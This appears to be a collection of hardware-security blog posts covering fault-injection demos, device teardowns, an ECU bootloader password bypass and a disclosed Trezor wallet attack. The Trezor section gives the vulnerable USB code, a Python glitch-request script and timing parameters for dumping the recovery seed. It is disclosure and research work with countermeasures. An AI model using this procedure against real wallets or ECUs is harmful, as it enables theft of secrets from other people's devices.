On April 1st, 2022 I gave a “workshop” at New England Hardware Security Day. This blog post is a quick summary of some of the links to recreate my demos from that talk. Here is a copy of the slides if you’d like them:
This demo is pretty simple – it recreates the classic DFA attack on RSA (I find David’s description great here, or you can see my Hardware Hacking Handbook which includes another derivation of it using a different method).
You can see the full code source in my repo from Hackaday Remoticon 2021. That repo just includes the R-Pi Python side (it also makes reference to voltage glitching, which I showed in the talk as another way to perform the demo).
You’ll need to install a specific version of pycryptodome along with a library that performs the analysis afterwards:
The actual fault injection in my demo was done with the PicoEMP. This is a low-cost/open-source EMFI tool. Critically it doesn’t require dangerous exposure to high voltage that some other open-source tools inherently present.
Watch out with this demo – it can be annoying as you crash the R-Pi a lot while dialing it in! And it can take a while to boot, but I gaurantee you it will work!
RISC-V Soft-Core
This demo was based on one of the targets that will come with the ChipWhisperer-Husky, an iCE40 based FPGA target.
The soft-core in question is the excellent NEORV32 RISC-V core. I find that core’s got great documentation. You don’t need to build the core to use the existing design, as the ChipWhisperer repo has a pre-built binary of the FPGA image. So you can compile software for that image. But it’s fun to build your own core!
This demo uses the ChipWhisperer CW305 board (here in the A35 variant), which has a series of nice ECC jupyter notebook tutorials . These tutorials will walk you through how the entire attack works:
The jupyter labs.
The ECC core is based on the excellent and open-source CrypTech project.
What’s inside of Apple’s new AirTag? There was already an iFixIt teardown (which I swear was missing a few items that are there now), but of course was curious to see what sort of protection was enabled. Notably the nRF chip used is likely vulnerable to a known bypass of security as well. With that in mind, I set out to see how we could dump some data from this thing – the good news is you can access a lot of interesting stuff (including the SPI flash) right from the backside, which requires you to simply pop the first plastic cover off. This is super-easy to do without damaging anything. Going further than that is tricky to keep it all intact.
Apple AirTag with Numbered Test Points
If you want to jump right to the answers, check out my AirTag-RE repo on github where I list the known test points that will be of interest. You can also see my twitter thread where I started the teardown:
OK I didn't appreciate how jam-packed this thing is from @iFixit teardown photos. Also it's 0.3mm PCB so I'm pretty sure I broke some solder joints getting it out. Test pads are accessible w/o removing PCB so if this one isn't working will test another one. pic.twitter.com/KmqGUDWkP6
This post is a summary of some work on an accepted paper for ESCAR EU 2020. This work was demonstration on certain NXP chips & GM ECUs, but the idea of both the attack & understanding how portable results are is applicable across the entire domain.
NOTE TO CAR TUNERS: I won’t perform this for hire on your ECU, please don’t email me asking this. The cost for me to do this type of work under hire would also be many times the HPTuners fee, and without any of of the actual tuning interface (I’m only attacking the bootloader, I never ever built a reflash tool that would be needed, yet alone the mapping work etc).
This work was presented as a way to help automotive system designers understand the “real” threat to their systems, something that is hard to do when tuners hide their methods for commercial reasons. While I don’t know if the method I’m presenting is used by the car tuners, I assume some variant of it has been before (I doubt I’m the “true” discoverer). As I mentioned in the paper, I’m also not the first to turn EMFI onto automotive devices in an academic setting (another nice paper ref’d is the Safety != Security work). One contribution of my work is it directly talks about practicality, something critical for threat modelling but often skipped due to how messy this is. You can build the attack into a “portable rig” as shown here in a final demonstration:
Complete attack demonstration showing potential for a fully portable version.
This portable rig is designed to show something along the lines of “pro garage” or “tuner garage” capabilities. It doesn’t need a ton of expertise to execute the attack, and opening up ECUs and probing them is widely done as part of regular tuning already (often called a type of “bench flash”). The real research wasn’t done with the Arduino setup, but instead using ChipWhisperer as part of the triggering with Python scripts searching:
The science version of the hardware lab has a more flexible design.
The Arduino demonstration shown previously is not usable as-is for tuning. It’s very fiddly and hasn’t been optimized, so I can’t productize what was shown there easily (you can tell I get sick of people looking for tuning solutions…).
The attack is possible on these devices, as they have a hardware bootloader enabled with some pin on the board. This requires you to short that pin to GND to enter the bootloader mode, at which point the device is looking for a password. Using electromagnetic fault injection, you can bypass the password check such that an incorrect password is accepted.
You can use power analysis to discover some of the timing, as done in the paper. Comparing a good password to a bad password shows a clear point in time where the password logic differs:
Interestingly, you can also see the red “incorrect password” trace appears to spin into an infinite loop (or similar), which would be around cycle 100 on the above figure.
As an important caveat: EMFI works against almost any microcontroller. Thus there is no “flaw” in the NXP MCU or GM usage of it, many other devices can be attacked using this same technique. The NXP MCU has long-term support (meaning it sticks around 15+ years), and was designed long before fault injection was on the radar of these devices as a realistic threat.
I recently tore down a square terminal (the one with the LCD screen) and wanted to share some of these results. I haven’t photographed everything as was mostly interested in how the secure areas of it are down. You can see an overview in the following video if you want to see how the whole thing fits together.
Teardown of Square Terminal Video
You can pull the main boards out to boot the thing on your bench (WARNING: as you see in the video above, this will trip the tamper circuits and destroy the device from being able to register/use):
Benching the boards – tamper shield removed from secure device (more on that later).
To start with the boring, here is the android board. It uses an APQ8039 (SnapDragon 615) as the main processor, with a KMQE60013M-B318 which integrates NAND (Emmc) and LPDDR in one package.
Alright, cool enough? While let’s get into the main stuff. There is a “security board” which I talk about in the following video:
This board features: MK21FX512 main microcontroller, a TDA9034 smartcard interface, a “Square K400Q”, a Cirque ICA037 touch controller, STM32F0, TS3A44159RGTR (analog mux), Lattice ICE5LP2K FPGA. Here’s a photo of the board with the taper screen removed:
The tamper shield covers all of those test pads. Here’s a photo of the tamper screen:
Very conveniently (for us), Square has filed a number of patents related to the tamper. In particular, here and here feature this exact cover:
I had measured out the connections, but the patent itself detailed them:
They patent also explains the land patterns on the PCB. The extra rings around it are for guard rings – if someone were to squirt some conductive glue into the enclosure, they would also trip the guard ring. Cool!
The other question of what is the Square K400Q device, which has a 13.56 MHz crystal hanging off it? While it turns out Square acquired a company called Kili Technology. And Kili Technology had a product called the K400Q, which is also in QFN-56 package. You can find the product page here (thanks to archive.org). No full datasheet, but it does have a short product brief:
What else is in it? Unclear exactly, but I would bet it’s using an enSilica RISC processor based on this press release. Unfortunately there aren’t public tools for it, although Lauterbach supports it in some form.
Finally – where is that security mesh handled? In my video I trace out some of it – the backup battery seems to run across the mesh on one side. The otherside seems to route to the STM32F0 processor. So it might be that the STM32F0 is performing some of the security mesh checking, which then triggers the Secure Destroy Interface (SDI) on the Square K400Q microcontroller. The STM32F0 has some epoxy blocking a few pins (very suspicious) as does the analog mux. The analog mux has some interesting-looking signals on it that make me suspect it is also part of the security mesh.
As a small side-note: all those test pads are right at the edge of the mesh. I haven’t tested yet, but I’m curious if you can dig down ‘under’ the shield without tripping anything. Or a very very fine shim may fit between the PCB & shield perhaps. Lots of stuff to test!
But that’s all for now. Project has been shelved for a bit, but hopefully you enjoy this look into the Square teardown!
MINOR UPDATE: I removed the epoxy around the STM32F0 – it looks like it might be near the mesh, but the mesh isn’t actually routing to the STM32F0 inputs (not 100% clear yet). The mesh seems to power the backup power for the MK21 instead, so it’s clear more effort is needed. Next step will be to remove the BGA on the MK21 so can probe where the mesh is going exactly.
Have you been interested in the Echo Dot device? One feature they mention is that there is a microphone off button. I spent a few hours reverse engineering this, and recorded (in un-edited glory) the process:
The resulting schematic is shown below:
The astute reader will note the only pin under direct control allows the disabling of the microphone, it cannot re-enable it. However – there is one more loophole to check.
The microphone comes up in an “online” state due to the strapping circuit. On quick check, it appears the 3.3V source is coming directly from a main 3.3V regulator which doesn’t seem to be controlled by the microcontroller. But I don’t guarantee there isn’t some way for the microcontroller to turn off the entire power, which if so would cause the microphone to be re-enabled when the device turns back on. It’s the last thing I’ll investigate, but will take some more effort to do so.
At CHES 2019 [rump session], I presented my revolutionary talk on Time Travel Resistant Cryptography (TTRC). This is a hugely important area of research that has been widely ignored in academic work, and it’s time to finally make this right.
Why is this so critical? While Post Quantum Cryptography (PQC) gets NIST contests, and invested companies, nobody is considering TTRC. The general thought-process of PQC is that the existence of sufficiently powerful quantum computers is an open problem with no clear solution. BUT – if someone solves that problem (that is unclear is even physically possible to solve), it’s going to be hell on Earth for crypto implementations. Better safe than sorry.
That sounds a hell of a lot like some other problems to me.
And that problem even have had multiple movies made about it:
Lots of open questions exist. But note that many of them are not so unreasonable. For example – what if time travel requires us to create a Closed Timelike Curve (CTC), and time travel is only possible from the point that curve is created and onward.
This would mean that from the point the CTC is created crypto would immediately be broken, but any point before that (i.e., now) is safe. Thus we must create TTRC implementations since we cannot know when CTCs could be created.
I discuss many of these problems in my CHES 2019 Rump Presentation, you can see the slides below. When video is posted I’ll update this blog post with such material.
This blog post covers several topics that I should have made independent posts about… but anyway. Here we are. It’s September and I should have done this months ago.
Trezor / USB Hacking Updates (Black Hat + WOOT)
I had an earlier blog post with details of the Trezor attack. It turns out this is more generic type of attack than I realized, so I extended this work into a WOOT paper as well. Quickly I thought I should update on that…
This paper includes some additional details. One major thing is that the USB attack I used in the Trezor applies to many other devices. Basically almost everything has something like the following chunk of code:
if (ālength > setupā>wLength) {
ālength = setupā>wLength;
}
The problem comes about because the wLength field ends up coming from the computer (host). Using fault injection we can always cause that code-path to be taken, meaning we can read out data directly from the target device. This applies in only certain circumstances… here is a quick flow-chart of when you should care:
As mentioned on the Trezor blog post, their latest security patch fixes a flaw I disclosed to them in Jan 2019. This flaw meant an attacker with physical access to the wallet can find the recovery seed stored in FLASH, and leave no evidence of tampering.
This work was heavily inspired by the wallet.fail disclosure – I’m directly dumping FLASH instead of forcing the flash erase then dumping from SRAM, so the results are the same but with a different path. It also has the same limitations – if you used a password protected recovery seed you can’t dump that.
Practically, it has the advantage of not requiring you to modify/tamper with the enclosure at all either to do the fault injection or read data off . Wallet.fail uses the physical JTAG connection, whereas I’m using the USB connection. But by comparison the wallet.fail attack is more robust and easier to apply – my EMFI attack can be fiddly to setup, and there is some inherent timing jitter due to the USB stack processing. Without further effort to speed up my attack, it’s likely the process of opening the enclosure & applying the wallet.fail method would be a faster in practice.
Please do not contact me if you have a “forgotten password” or something similar with your Trezor. I’m not willing to perform this work under any circumstances.
Summary
USB requests that read from memory (such as a USB descriptor read) accept a maximum packet size that is MIN(requested_size, size_of_data_structure). The code as written defaults to accepting the requested size, and overwriting it with a smaller āvalidā value.
Using fault injection (here demoād with EMFI), this check
can be skipped. The device will accept up to 0xFFFF as a size argument, giving
an attacker access to read large chunks of either SRAM or FLASH (depending
where the descriptor is stored).
Due to the FLASH memory layout, the sensitive metadata lies
roughly AFTER the descriptors stored in bootloader flash space. Thus an
attacker can read out the metadata structure from memory (seed etc). Notably
this does not require one to open
the enclosure due to use of EMFI.
Using voltage glitching would almost certainly work as well, but likely requires opening the enclosure making tampering more evident (possibly it would work via USB +5V input even which wouldnāt require opening the enclosure).
Details
Iāve chosen to demo this with WinUSB descriptor requests, as
they have a very simple structure. In addition the WinUSB has one descriptor in
FLASH and one in SRAM, giving you the ability to chose which memory segment to
dump. Other USB requests should work too, but I havenāt tested them.
Consider the following function, where the critical calls are the len = MIN(len,…) calls (two of them can be found):
static int winusb_control_vendor_request(usbd_device *usbd_dev,
struct usb_setup_data *req,
uint8_t **buf, uint16_t *len,
usbd_control_complete_callback* complete) {
(void)complete;
(void)usbd_dev;
if (req->bRequest != WINUSB_MS_VENDOR_CODE) {
return USBD_REQ_NEXT_CALLBACK;
}
int status = USBD_REQ_NOTSUPP;
if (((req->bmRequestType & USB_REQ_TYPE_RECIPIENT) == USB_REQ_TYPE_DEVICE) &&
(req->wIndex == WINUSB_REQ_GET_COMPATIBLE_ID_FEATURE_DESCRIPTOR)) {
*buf = (uint8_t*)(&winusb_wcid);
*len = MIN(*len, winusb_wcid.header.dwLength);
status = USBD_REQ_HANDLED;
} else if (((req->bmRequestType & USB_REQ_TYPE_RECIPIENT) == USB_REQ_TYPE_INTERFACE) &&
(req->wIndex == WINUSB_REQ_GET_EXTENDED_PROPERTIES_OS_FEATURE_DESCRIPTOR) &&
(usb_descriptor_index(req->wValue) == winusb_wcid.functions[0].bInterfaceNumber)) {
*buf = (uint8_t*)(&guid);
*len = MIN(*len, guid.header.dwLength);
status = USBD_REQ_HANDLED;
} else {
status = USBD_REQ_NOTSUPP;
}
return status;
}
We can see from disassembly this is a simple comparison to the maximum size. Iām mostly going to be looking at the guid structure since itās located in FLASH below the metadata. Glitching the code in the red box below would create our required vulnerability:
The glitch is inserted with a ChipSHOUTER EMFI tool. The Trezor is held in bootloader mode with two spacers on the buttons, and the EMFI tool is positioned above the case, as shown below:
The entire setup is shown below, which has the ChipSHOUTER
(bottom left), a ChipWhisperer-Lite (top left) for trigger delay, a Beagle 480
for USB sniffing/triggering (top center) and a switchable USB hub to
power-cycle the Trezor when the EMFI triggers the various hard fault/stack
smashing/memory corruption errors (top right).
The forced bootloader entry mode simplifies the glitch, as we can freely power cycle the device and try many glitches.
A glitch is timed based on a Total Phase USB analyzer. The USB request is sent from a host computer as shown below:
def get_winusb(dev, scope):
"""WinUSB Request is most useful for glitch attack"""
scope.io.glitch_lp = True #Enable glitch (actual trigger comes from Total Phase USB Analyzer)
scope.arm()
resp = dev.ctrl_transfer(int('11000001', 2), ord('!'), 0x0, 0x05, 0xFFFF, timeout=1)
resp = list(resp)
scope.io.glitch_lp = False #Disable glitch
return resp
This corresponds to reading the āguidā. The Beagle480 is setup to generate a trigger on the first two bytes of this request:
To confirm the timing, I also compiled my own bootloader,
and saw the sensitive operation was typically occurring in the 4.2 to 5.7uS
after the Beagle480 trigger. There was some jitter due to the USB stack
processing.
A ChipWhisperer-Lite is used to then generate a 4.4uS offset
(empirically a good āwaitingā place), after which an EMFI pulse is triggered.
Should the 4.4uS offset happen to line up with the length checking/limiting, we
can get a successful glitch.
A successful glitch will return much more data than expected ā possibly up to the full 0xFFFF, but because things are getting corrupted it sometimes seems to be less. Also some OSes limited the maximum size you can request -you can find some references to that on the libusb mailing list. As a first step you might just try 0x1FF or something (anything larger than the correct 0x92 response). But here is a screen-shot showing three correct transfers (146 bytes transferred) followed by an incorrect one, which dumped 24800 bytes:
Here is an example metadata from another dump (this doesnāt correspond to the screen-shot above), note I never set a PIN as I had damaged the screen since the first device I tested with was being used for development as well:
Simulating the Glitch
Note you can āsimulateā this glitch by simply commenting out
the length checking operation in the WinUSB request. This allows you to confirm
that should that operation be skipped, you can dump large chunks of memory
including the metadata.
This simulation could be useful in validating some of the proposed fixes as well (I would highly suggest doing such testing as part of regular building).
Reliability Notes
Note due to the timing jitter the glitch is very unreliable
(<0.1% success rate), however this typically translates to taking a few
hours due to how quickly the search can be done. So it remains extremely
practical since it seems reasonable for an attacker to have access to a wallet
for a few hours.
I suspect this could be improved by doing the USB request
from an embedded system (something like a GreatFET), which would allow me to
synchronize a device to the internal state of the Trezor. This would mean the
operation would be:
Send a USB request (get descriptor etc).
After the USB request comes back, send our
WinUSB/glitch target request at a very defined amount of time after we received
the USB request.
Insert the glitch.
Simple Fixes / Countermeasures
1) The low-level USB functions should accept some absolute
maximum size. For example, if you only ever do 64-byte transfers, never allow a
larger transfer to occur by masking upper bits to force them to zero. Do this
in multiple spots to make glitching past this more difficult.
2) The metadata needs to be guarded by invalid memory
segments. Doing a read from a valid segment to the metadata should hit an
invalid segment, causing an exception.
3) Move descriptor /metadata arrangement (less useful than #2 in practice).
Conclusions
EMFI is a simple way of abusing the USB stack in the Trezor. You’ll find a similar vulnerability in a number of USB stacks, meaning this type of attack should be something you validate against in your own devices.
More details of this example will be available in the book Jasper & I are working on for (eventual?) release.